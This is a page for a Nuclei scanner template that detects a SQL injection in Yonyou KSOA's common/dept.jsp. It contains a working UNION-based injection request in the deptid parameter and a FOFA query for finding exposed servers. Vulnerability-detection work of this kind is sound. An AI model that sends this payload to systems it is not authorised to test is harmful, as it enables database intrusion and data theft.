Skip to content

YonYou KSOA common/dept.jsp - SQL injection

ID: yonyou-ksoa-dept-sqli

Severity: critical

Author: DhiyaneshDK

Tags: yonyou,oa,sqli,ksoa

Yonyou KSOA contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

id: yonyou-ksoa-dept-sqli
info:
name: YonYou KSOA common/dept.jsp - SQL injection
author: DhiyaneshDK
severity: critical
description: |
Yonyou KSOA contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://mp.weixin.qq.com/s/I6aG2vFIi5nbVZfuVNpyDw
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
fofa-query: app="用友-时空KSOA"
tags: yonyou,oa,sqli,ksoa
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/common/dept.jsp?deptid=1'+UNION+ALL+SELECT+60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'{{num}}'))--+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '0x{{md5({{num}})}}'
- type: status
status:
- 200
# digest: 4a0a0047304502207c94d18fd6e1862723ed4c350e1144bf7a46379fdeec3853f62d45c66563a5f2022100d2fa38dbcac57ae06612775d781596e519620fd3de10790f498d040890a209b1:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml"

View on Github